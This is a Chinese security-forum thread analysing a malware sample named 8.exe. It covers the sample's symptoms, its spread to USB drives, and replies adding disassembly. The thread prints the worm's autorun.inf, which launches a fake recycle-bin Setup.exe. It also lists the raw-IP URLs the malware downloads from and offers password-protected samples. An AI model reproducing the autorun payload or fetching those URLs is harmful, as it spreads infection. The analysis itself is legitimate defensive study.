瑞星卡卡安全论坛

一．样本信息
样本名称：8.exe
样本大小：243KB
MD5：ccbe1775eb280c1b6187628534fc34da
病毒链接：
http://bbs.ikaka.com/showtopic-8695511-4.aspx
（病毒样本在35楼）
当时还以为是那个“极虎”病毒呢！！
http://bbs.ikaka.com/showtopic-8695965.aspx
看此帖子，越来越感觉这个病毒就是“极虎”了，自己之所不敢发到技术交流区，上面那个“极虎”分析帖子就是说明了一切。
我很想知道人家是怎么分析的，这个帖子和那个帖子差距太远了。
二．中毒现象
在虚拟机下联网的状态下运行此病毒，

 附件: 您所在的用户组无法下载或查看附件


运行之后会自动消失



 附件: 您所在的用户组无法下载或查看附件
随后系统慢慢会感觉很卡，此时的病毒正在链接网络下载病毒木马，并且在临时文件夹里生成数字和字母的随机文件，



 附件: 您所在的用户组无法下载或查看附件
观察的时候，不时的会有文件的创建，并且还会自动删除。
随后，利用工具查看系统进程，发现如下可疑：
这里说明一下，那个进程是正常的文件，压缩包里这个文件是正常的，只不过病毒是调用这个进程。
（说到这，自己问题出来了，对系统里的一些正常文件还是熟悉不到位）



 附件: 您所在的用户组无法下载或查看附件
按照文件路径一看：



 附件: 您所在的用户组无法下载或查看附件
很明显是病毒所创建的，在此文件夹是没有此文件的。
使用Windows清理助手，升级到最新版，进行扫描得知：

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件




最后打开SRE日志工具：

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件




最后，我看到有很多安全杀毒的进程被劫持，我就尝试一下访问瑞星杀毒软件的官网，还有卡卡助手的官网，发现都被屏蔽了，都不能打开，这里我就疑惑了是怎么屏蔽的，一般病毒屏蔽网页，一般采用修改HOST里文件，但是在扫描出日志后我发现哪里并没有修改，随后我又看看浏览器是否出问题，我并没有发现异常，主页也没有被修改，我猜测很有可能是IE浏览器程序被替换，但是我不确定。



 附件: 您所在的用户组无法下载或查看附件
更让我没有想到的是，此病毒还通过U盘传播，这个很巧合，在虚拟机里测试病毒，一般我是不查U盘，谁知就这么一查就利用上了，发现此病毒的另一种传播方式。
此病毒传播的时候，在U盘里自动创建3个文件，





 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件
那个734文件里的东西我很疑惑！

 附件: 您所在的用户组无法下载或查看附件


那个假冒伪劣的回收站里的文件就是病毒文件了。

 附件: 您所在的用户组无法下载或查看附件
那个autorun.inf这个文件大家应该熟悉不过了。
代码如下：
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
shell\open\Default=1//
shell\explore=资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe Show
这个U盘的里的病毒我也中招了，但是我看没有啥变化，不知道这病毒葫芦里卖的什么药。下面的病毒文件我打包上传。
还有就是我把那几个U盘的可疑文件删除了，但是唯有一个734（病毒创建的文件名）文件没有删除，点击右键删除没有任何反应，并且属性也没有办法改掉。





 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件
三．手工清除
此病毒我看也不怎么流行，我就不怎么说明具体查杀方法了，下面打包上传我扫描日志，留给大家练习，还以用来做PLA工具的实验品。

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)

附件: 11.jpg

第一个是测试病毒样本，
第二个是传播到我U盘里的病毒样本。
解压密码都是：123
第三个是扫描的日志

附件: 8.rar

附件: 被感染的U盘里的病毒样本.rar

附件: SREngLOG.log

好久没有像楼主这样了。

楼主加油。。

送你一句话：“你是个人才啊！”

我指出一个问题
那个RAR.EXE是正常文件任何安装WINRAR的机器都有，进程里面出现只不过是因为病毒调用了RAR.EXE来感染压缩包内的EXE

 附件: 您所在的用户组无法下载或查看附件
蒙了:kaka8: ，确实是，今天的那个帖子新浪哥还说来这没有注意到。。。

病毒下载
http://67.159.35.100:8080/Down/xx.rar
和http://67.159.35.85:8080/Down/33.rar

唉，虚拟机没装系统
不敢实机测试，近400G的资料都没刻盘····
毁了就完了

:kaka20: 你这两个下载地址怎么截获的，我怎么没有弄到....

00406963  |.  68 409B4000  push    00409B40                        ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"
00406968  |.  68 02000080  push    80000002                        ; |hKey = HKEY_LOCAL_MACHINE
0040696D  |.  FF15 F4914000 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA
00406973  |.  68 749B4000  push    00409B74                        ; /SubKey = "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
00406978  |.  68 02000080  push    80000002                        ; |hKey = HKEY_LOCAL_MACHINE
0040697D  |.  FF15 F4914000 call    dword ptr [<&SHLWAPI.SHDeleteKey>; \SHDeleteKeyA

00407601  .  68 2CC84000  push    0040C82C                        ; /<%s> = "Down/0.exe"
00407606  .  8D45 B0      lea    eax, dword ptr [ebp-50]          ; |
00407609  .  50            push    eax                              ; |<%s>
0040760A  .  68 409E4000  push    00409E40                        ; |Format = "http://%s/%s"
0040760F  .  8D85 A8FEFFFF lea    eax, dword ptr [ebp-158]        ; |
00407615  .  50            push    eax                              ; |s
00407616  .  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA


这东东动作挺多的。。。

:kaka6: 反汇编，用代码分析病毒。。。
天啊，这是我梦寐以求的分析病毒方式。

我只是小菜。。。
大概看看代码而已。。。其实我什么都不懂

貌似看懂一点点，修改注册表，创建新键值，下载病毒样本。。

:kaka12: 和我一样哦，可以体会此时此刻的心情。。

rar现在一出现就被误解为极虎了。。。。。。

可以这么说，这个RAR进程出现，是病毒在调用它下载木马病毒，随后这个进程会自动消失的。

 附件: 您所在的用户组无法下载或查看附件

我也来测试一下。

Rar.exe是winrar的命令行版本，一般不出现在进程里